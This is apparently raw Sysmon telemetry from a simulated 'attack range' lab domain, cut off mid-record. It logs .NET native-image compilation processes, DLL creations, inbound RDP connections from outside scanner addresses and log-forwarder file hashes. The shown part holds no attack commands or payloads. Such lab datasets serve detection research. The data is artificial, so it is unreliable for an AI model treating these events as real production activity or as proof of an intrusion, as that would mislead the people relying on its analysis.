14:57:37.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-0B0D-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:37.514{A7A01FEF-EBE1-607E-0A0D-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b68-0\Microsoft.Office.Tools.Common.dll2021-04-20 14:57:37.514 354300x800000000000000075147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.422{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36648-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000075146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-0A0D-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.264{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-0A0D-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-0A0D-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.217{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-090D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.186{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-090D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.186{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-090D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:37.155{A7A01FEF-EBE1-607E-080D-00000000BB01}6164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1814-0\Microsoft.Office.Tools.dll2021-04-20 14:57:37.155 10341000x800000000000000075139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-080D-00000000BB01}6164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.108{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-080D-00000000BB01}6164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.108{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-080D-00000000BB01}6164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.077{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-070D-00000000BB01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.077{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-070D-00000000BB01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-070D-00000000BB01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.014{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-060D-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050298Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:35.846{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52526-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050297Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:35.828{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51812-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050296Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:35.223{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56857-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050295Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:34.259{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50343-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050294Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:37.380{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942232D2ECB7B4C0E430D4441F490EA6,SHA256=C79F62E83C7535DAC15C2279667A81D4AD9BF94C3E6A0A6F620E3CAB4703324C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050293Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:37.333{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C16E4AF90E08D9B334953005B0A3B7C,SHA256=25227B0D1692B6B9F9968586C5EDA0FFB325451213995E381605F5078F63F2E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.733{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE2-607E-100D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.717{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE2-607E-100D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.717{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE2-607E-100D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.655{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE2-607E-0F0D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.639{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE2-607E-0F0D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.639{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE2-607E-0F0D-00000000BB01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Window